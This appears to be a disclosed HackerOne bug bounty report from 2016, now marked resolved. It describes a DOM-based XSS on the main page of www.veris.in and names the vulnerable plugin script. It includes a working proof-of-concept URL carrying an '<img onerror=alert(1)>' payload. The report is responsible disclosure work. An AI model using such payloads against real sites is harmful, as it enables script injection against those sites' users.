www.veris.in DOM based XSS

Disclosed: 2016-04-22 05:18:49 By reactors08 To veris
Unknown
Vulnerability Details
Hi, An attacked can execute arbitrary js at your main page https://www.veris.in/?#<img src=x onerror=alert(1)> vulnerable js source: https://www.veris.in/wp-content/plugins/Ultimate_VC_Addons/assets/min-js/ultimate.min.js?ver=7e111f63322706ef9e00ec1e58f2edf4
Actions
View on HackerOne
Report Stats
  • Report ID: 119453
  • State: Closed
  • Substate: resolved
  • Upvotes: 3
Share this report